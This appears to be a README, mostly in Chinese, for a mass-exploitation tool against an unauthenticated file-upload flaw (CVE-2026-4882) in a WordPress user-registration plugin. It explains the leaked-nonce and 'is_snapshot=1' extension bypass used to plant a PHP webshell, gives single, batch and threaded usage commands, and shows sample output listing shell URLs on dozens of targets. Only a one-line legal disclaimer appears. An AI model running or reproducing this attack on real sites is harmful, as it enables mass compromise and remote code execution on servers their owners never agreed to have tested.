User Registration Advanced Fields <= 1.6.20 - 未认证任意文件上传
User Registration Advanced Fields <= 1.6.20 - 未认证任意文件上传
描述
WordPress 的 User Registration Advanced Fields 插件(版本至 1.6.20 及以下)存在未认证任意文件上传漏洞,攻击者可借助 uraf_profile_picture_upload_method_upload AJAX 操作进行利用。该插件在任何包含注册表单的页面上通过 wp_localize_script() 泄漏有效的 nonce,并且使用 is_snapshot=1 参数可以完全绕过文件扩展名验证。这使得未认证攻击者能够上传任意文件(例如伪装成 GIF 图片的 PHP WebShell),这些文件存储在 wp-content/uploads/user_registration_uploads/temp-uploads/ 中,从而导致完全远程代码执行(RCE)。
~ CVSS 评分:9.8(严重)
~ 受影响版本:<= 1.6.20
单个目标:
python3 shadow.py -u https://target.com -s shadow.php批量目标:
python3 shadow.py -f targets.txt -s shadow.php -t 30交互模式:
python3 shadow.py
╔══════════════════════════════════════════════════╗
║ CVE-2026-4882 — Full Auto Exploit ║
║ User Registration Advanced Fields <= 1.6.20 ║
║ by: Shadow x Friska 😈🔥 ║
╚══════════════════════════════════════════════════╝
═══ Interactive Mode ═══
📄 Target file (e.g. targets.txt): list.txt
⚡ Threads 1-50 (default 30): 30
🎯 Targets : 75
📁 Shell : shadow.php
⚡ Threads : 30
💣 Brute : 1-500
🩷 [3/75] http://target.com
→ http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
💀 [1/75] http://example.com — no nonce
❌ [4/75] http://example2.com — upload failed
未经授权使用你不拥有或无权限测试的系统是违法的。